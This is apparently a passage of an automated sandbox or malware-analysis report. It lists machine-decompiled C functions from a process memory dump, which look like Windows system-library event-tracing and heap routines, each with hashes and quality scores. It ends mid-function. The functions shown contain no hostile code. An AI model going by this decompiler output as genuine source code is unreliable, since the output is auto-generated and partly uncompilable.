                                        • Opcode Fuzzy Hash: 5ec6ea0ca289a404bd9931214c349206696c1535d8c97922840855ea60968d64
                                        • Instruction Fuzzy Hash: 58018071A01258AFCB04DF68D845FAEBBB8EF44710F00405AB905EB280DA74DA00CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E0545138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_t32 = __edx;
                                        				_t27 = __ebx;
                                        				_v8 =  *0x548d360 ^ _t35;
                                        				_t33 = __edx;
                                        				_t34 = __ecx;
                                        				E053DFA60( &_v60, 0, 0x30);
                                        				_v20 = _a4;
                                        				_v16 = _a8;
                                        				_v28 = _t34;
                                        				_v24 = _t33;
                                        				_v54 = 0x1033;
                                        				if(E053B7D50() == 0) {
                                        					_t21 = 0x7ffe0388;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}


















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2183908bcc7f729e683dc367e3a8087099ebb6f7786e557e8c7b4c86f3d38a5d
                                        • Instruction ID: a6106eb0c44538f0292288538f739119406a93db7bf6debba5da8dba3acb7d0b
                                        • Opcode Fuzzy Hash: 2183908bcc7f729e683dc367e3a8087099ebb6f7786e557e8c7b4c86f3d38a5d
                                        • Instruction Fuzzy Hash: 1D015271E05218AFDB14DFA9D885FAEBBB8EF44710F00406AB905EB381DA749A01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                        				signed char _t11;
                                        				signed char* _t12;
                                        				intOrPtr _t24;
                                        				signed short* _t25;
                                        
                                        				_t25 = __edx;
                                        				_t24 = __ecx;
                                        				_t11 = ( *[fs:0x30])[0x50];
                                        				if(_t11 != 0) {
                                        					if( *_t11 == 0) {
                                        						goto L1;
                                        					}
                                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                        					L2:
                                        					if( *_t12 != 0) {
                                        						_t12 =  *[fs:0x30];
                                        						if((_t12[0x240] & 0x00000004) == 0) {
                                        							goto L3;
                                        						}
                                        						if(E053B7D50() == 0) {
                                        							_t12 = 0x7ffe0385;
                                        						} else {
                                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                        						}
                                        						if(( *_t12 & 0x00000020) == 0) {
                                        							goto L3;
                                        						}
                                        						return E05417016(_a4, _t24, 0, 0, _t25, 0);
                                        					}
                                        					L3:
                                        					return _t12;
                                        				}
                                        				L1:
                                        				_t12 = 0x7ffe0384;
                                        				goto L2;
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction ID: 420874bd86110c678e3b4aa8b3e229c34f05c0b8426b1f0f93eda46e945488e3
                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction Fuzzy Hash: 98018F72204A809FD322C71DC998F76B7EDFB45750F0940A1FA1ACBA61D7A8DC40C720
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E05461074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                        				char _v8;
                                        				void* _v11;
                                        				unsigned int _v12;
                                        				void* _v15;
                                        				void* __esi;
                                        				void* __ebp;
                                        				char* _t16;
                                        				signed int* _t35;
                                        
                                        				_t22 = __ebx;
                                        				_t35 = __ecx;
                                        				_v8 = __edx;
                                        				_t13 =  !( *__ecx) + 1;
                                        				_v12 =  !( *__ecx) + 1;
                                        				if(_a4 != 0) {
                                        					E0546165E(__ebx, 0x5488ae4, (__edx -  *0x5488b04 >> 0x14) + (__edx -  *0x5488b04 >> 0x14), __edi, __ecx, (__edx -  *0x5488b04 >> 0x14) + (__edx -  *0x5488b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                        				}
                                        				E0545AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                        				if(E053B7D50() == 0) {
                                        					_t16 = 0x7ffe0388;
                                        				} else {
                                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				if( *_t16 != 0) {
                                        					_t16 = E0544FE3F(_t22, _t35, _v8, _v12);
                                        				}
                                        				return _t16;
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4dc736b8f8ba5260e7634331152dac006f3ef5f9f1db56e48fbfbf0f9ea55ae5
                                        • Instruction ID: db64de78c0b886e4c60a2cdd5b876920f1ca14cb99f143ebfc9e5f5bf8a72106
                                        • Opcode Fuzzy Hash: 4dc736b8f8ba5260e7634331152dac006f3ef5f9f1db56e48fbfbf0f9ea55ae5
                                        • Instruction Fuzzy Hash: A1012872608741AFCB10EB29C944B9B77E5BBC4310F04CA5AF88683790DE30D841CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E0544FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				short _v58;
                                        				char _v64;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_t24 = __ebx;
                                        				_v12 =  *0x548d360 ^ _t32;
                                        				_t30 = __edx;
                                        				_t31 = __ecx;
                                        				E053DFA60( &_v64, 0, 0x30);
                                        				_v24 = _a4;
                                        				_v32 = _t31;
                                        				_v28 = _t30;
                                        				_v58 = 0x267;
                                        				if(E053B7D50() == 0) {
                                        					_t18 = 0x7ffe0388;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v64);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef2b95fa657f7bf8313878835ed815067ae815dcd17ba405aec7d23738566f0d
                                        • Instruction ID: ac758b9eec7d070b6ab11055e38ceffc6cc6d70812875bdb3b93d3c13128d73c
                                        • Opcode Fuzzy Hash: ef2b95fa657f7bf8313878835ed815067ae815dcd17ba405aec7d23738566f0d
                                        • Instruction Fuzzy Hash: 59018871F05218AFD714DF69D845FAEBBB8EF44700F00406AB9019B381D9749901CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E0544FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				short _v58;
                                        				char _v64;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_t24 = __ebx;
                                        				_v12 =  *0x548d360 ^ _t32;
                                        				_t30 = __edx;
                                        				_t31 = __ecx;
                                        				E053DFA60( &_v64, 0, 0x30);
                                        				_v24 = _a4;
                                        				_v32 = _t31;
                                        				_v28 = _t30;
                                        				_v58 = 0x266;
                                        				if(E053B7D50() == 0) {
                                        					_t18 = 0x7ffe0388;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v64);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee5d59def2d30610b3f023264d1216e0e4f3da8d46374f15f5660d432fb45dee
                                        • Instruction ID: c9c6c6094fb9fe20fd745a23534c326b26e7b1bb9bafed91e8628bcaf281b205
                                        • Opcode Fuzzy Hash: ee5d59def2d30610b3f023264d1216e0e4f3da8d46374f15f5660d432fb45dee
                                        • Instruction Fuzzy Hash: 20018871F01258AFD714DB69E845FAFB7B8EF45700F04406AB9019B380D9749901CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E05468A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				short _v66;
                                        				char _v72;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_v12 =  *0x548d360 ^ _t32;
                                        				_t31 = _a8;
                                        				_t30 = _a12;
                                        				_v66 = 0x1c20;
                                        				_v40 = __ecx;
                                        				_v36 = __edx;
                                        				_v32 = _a4;
                                        				_v28 = _a8;
                                        				_v24 = _a12;
                                        				if(E053B7D50() == 0) {
                                        					_t18 = 0x7ffe0386;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v72);
                                        				_push(0x14);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1528acb0a60e2ce8742968dcae55bdd38be94e136e3716ce48409123e45dc7f9
                                        • Instruction ID: 9f6e1a157e9828df52632f4072452189451ca0095a6b7b850c8bd2b1fb00d543
                                        • Opcode Fuzzy Hash: 1528acb0a60e2ce8742968dcae55bdd38be94e136e3716ce48409123e45dc7f9
                                        • Instruction Fuzzy Hash: BA012176A0121C9FCB04DFA9D945AEEB7F8FF48350F10405AF905E7341D634A901CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E05468ED6(intOrPtr __ecx, intOrPtr __edx) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				short _v62;
                                        				char _v68;
                                        				signed char* _t29;
                                        				intOrPtr _t35;
                                        				intOrPtr _t41;
                                        				intOrPtr _t42;
                                        				signed int _t43;
                                        
                                        				_t40 = __edx;
                                        				_v8 =  *0x548d360 ^ _t43;
                                        				_v28 = __ecx;
                                        				_v62 = 0x1c2a;
                                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                        				_v24 = __edx;
                                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                        				if(E053B7D50() == 0) {
                                        					_t29 = 0x7ffe0386;
                                        				} else {
                                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v68);
                                        				_push(0x1c);
                                        				_push(0x20402);
                                        				_push( *_t29 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a8d6eb875a725b0be988d4cdbb0343a297ea1438cb2067da9ccab2ecbc2626a
                                        • Instruction ID: febbffd67dd165d11e20fb58cad3be0c74374e9b1fba8e36af72ffb5cf7bed97
                                        • Opcode Fuzzy Hash: 3a8d6eb875a725b0be988d4cdbb0343a297ea1438cb2067da9ccab2ecbc2626a
                                        • Instruction Fuzzy Hash: 5A112D71E042199FDB04DFA8D445BAEFBF4FF08300F0442AAE919EB782E6349940CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0539DB60(signed int __ecx) {
                                        				intOrPtr* _t9;
                                        				void* _t12;
                                        				void* _t13;
                                        				intOrPtr _t14;
                                        
                                        				_t9 = __ecx;
                                        				_t14 = 0;
                                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                        					_t13 = 0xc000000d;
                                        				} else {
                                        					_t14 = E0539DB40();
                                        					if(_t14 == 0) {
                                        						_t13 = 0xc0000017;
                                        					} else {
                                        						_t13 = E0539E7B0(__ecx, _t12, _t14, 0xfff);
                                        						if(_t13 < 0) {
                                        							L0539E8B0(__ecx, _t14, 0xfff);
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                        							_t14 = 0;
                                        						} else {
                                        							_t13 = 0;
                                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                        						}
                                        					}
                                        				}
                                        				 *_t9 = _t14;
                                        				return _t13;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                        • Instruction ID: 79f39a092f473413b36a83664e03adfab2cbecafd69d9e5ce2dd2aaaa90ffa06
                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                        • Instruction Fuzzy Hash: 71F0FCB33056229BEF36AA954895F67B69A9FC1A60F150835F2069B744C9B08C0297E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0539B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                        				signed char* _t13;
                                        				intOrPtr _t22;
                                        				char _t23;
                                        
                                        				_t23 = __edx;
                                        				_t22 = __ecx;
                                        				if(E053B7D50() != 0) {
                                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                        				} else {
                                        					_t13 = 0x7ffe0384;
                                        				}
                                        				if( *_t13 != 0) {
                                        					_t13 =  *[fs:0x30];
                                        					if((_t13[0x240] & 0x00000004) == 0) {
                                        						goto L3;
                                        					}
                                        					if(E053B7D50() == 0) {
                                        						_t13 = 0x7ffe0385;
                                        					} else {
                                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                        					}
                                        					if(( *_t13 & 0x00000020) == 0) {
                                        						goto L3;
                                        					}
                                        					return E05417016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                        				} else {
                                        					L3:
                                        					return _t13;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                        • Instruction ID: eea0b575996edcbb98b8ecdef6cc1888d7187eafd8c8538efed917bcec759424
                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                        • Instruction Fuzzy Hash: F201A9323046809BDF26975DD808F6AFB99FF81794F094465FA558BAB1D6B9C800C325
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0542FE87(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t32;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_v8 =  *0x548d360 ^ _t35;
                                        				_v16 = __ecx;
                                        				_v54 = 0x1722;
                                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                        				if(E053B7D50() == 0) {
                                        					_t21 = 0x7ffe0382;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00f9083b4685a12bdf8ccd4c17888ab1c52d64607880dc806c3a9162530bcc75
                                        • Instruction ID: 9928f5079a8d64122854e11bac5538eeada6b9ad2c6221bf29a222c544cb7e39
                                        • Opcode Fuzzy Hash: 00f9083b4685a12bdf8ccd4c17888ab1c52d64607880dc806c3a9162530bcc75
                                        • Instruction Fuzzy Hash: C0016271A04218AFCB14DFA8D546AAEB7F4FF04300F504199B505DB382DA35D901CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E05468F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				short _v50;
                                        				char _v56;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_v8 =  *0x548d360 ^ _t32;
                                        				_v16 = __ecx;
                                        				_v50 = 0x1c2c;
                                        				_v24 = _a4;
                                        				_v20 = _a8;
                                        				_v12 = __edx;
                                        				if(E053B7D50() == 0) {
                                        					_t18 = 0x7ffe0386;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v56);
                                        				_push(0x10);
                                        				_push(0x402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7834fb1d9539118fc8c82fd731f35e194151d666b037e819c379aba694f3bd64
                                        • Instruction ID: 9a0c0296aa6fc6219e06552754cf792f1d8615550184ee2c14809148adb5a81a
                                        • Opcode Fuzzy Hash: 7834fb1d9539118fc8c82fd731f35e194151d666b037e819c379aba694f3bd64
                                        • Instruction Fuzzy Hash: 5D013C75A05209AFDB04EFA8E545AAEB7F4EF48300F10445AB905EB381EA74DA00CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E0545131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				short _v50;
                                        				char _v56;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_v8 =  *0x548d360 ^ _t32;
                                        				_v20 = _a4;
                                        				_v12 = _a8;
                                        				_v24 = __ecx;
                                        				_v16 = __edx;
                                        				_v50 = 0x1021;
                                        				if(E053B7D50() == 0) {
                                        					_t18 = 0x7ffe0380;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        				}
                                        				_push( &_v56);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33f9a4ffe3b46e3d1176cf51f25b25dc24d0768939e88b5f27373df2bbd2aab1
                                        • Instruction ID: b06edc6a0470a932f52411207385fa07e482eb4b1d892c7553ad67817d7896b9
                                        • Opcode Fuzzy Hash: 33f9a4ffe3b46e3d1176cf51f25b25dc24d0768939e88b5f27373df2bbd2aab1
                                        • Instruction Fuzzy Hash: CD013C71E05208AFDB04EFA9D559AAEB7F4FF48700F00406ABD45EB381EA749A00CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053BC577(void* __ecx, char _a4) {
                                        				void* __esi;
                                        				void* __ebp;
                                        				void* _t17;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t21;
                                        
                                        				_t18 = __ecx;
                                        				_t21 = __ecx;
                                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E053BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x53711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					__eflags = _a4;
                                        					if(__eflags != 0) {
                                        						L10:
                                        						E054688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                        						L9:
                                        						return 0;
                                        					}
                                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        					if(__eflags == 0) {
                                        						goto L10;
                                        					}
                                        					goto L9;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7de93b34cffb4d1df37df8be95e5d57f09944cf0f213a9d6bdba2e2fbb1f0e0
                                        • Instruction ID: acd1fb3b155f1634b86dd27c3739841c9219c646bb259acd90c886ae743916df
                                        • Opcode Fuzzy Hash: c7de93b34cffb4d1df37df8be95e5d57f09944cf0f213a9d6bdba2e2fbb1f0e0
                                        • Instruction Fuzzy Hash: C9F0B4B291569E9FF731CB16C04CFE27BE9AB05670F44A467D70687D01C6E4DE84C251
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E05468D34(intOrPtr __ecx, intOrPtr __edx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				short _v42;
                                        				char _v48;
                                        				signed char* _t12;
                                        				intOrPtr _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t25;
                                        				signed int _t26;
                                        
                                        				_t23 = __edx;
                                        				_v8 =  *0x548d360 ^ _t26;
                                        				_v16 = __ecx;
                                        				_v42 = 0x1c2b;
                                        				_v12 = __edx;
                                        				if(E053B7D50() == 0) {
                                        					_t12 = 0x7ffe0386;
                                        				} else {
                                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v48);
                                        				_push(8);
                                        				_push(0x20402);
                                        				_push( *_t12 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8d1214610819eddd1b958ebf464b8edafee1e0f999e2d62c53eb1289db8298a
                                        • Instruction ID: f0d310295ee4c3d36db34c681d6c1349aa8bbcdda2ce9b6120341066a9cd3d22
                                        • Opcode Fuzzy Hash: d8d1214610819eddd1b958ebf464b8edafee1e0f999e2d62c53eb1289db8298a
                                        • Instruction Fuzzy Hash: EFF05471F046089FD714EFB8E545BAEB7B4EF54700F508499E905EB391DA34D900CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E05452073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				signed char _t3;
                                        				signed char _t7;
                                        				void* _t19;
                                        
                                        				_t17 = __ecx;
                                        				_t3 = E0544FD22(__ecx);
                                        				_t19 =  *0x548849c - _t3; // 0x0
                                        				if(_t19 == 0) {
                                        					__eflags = _t17 -  *0x5488748; // 0x0
                                        					if(__eflags <= 0) {
                                        						E05451C06();
                                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                        						__eflags = _t3;
                                        						if(_t3 != 0) {
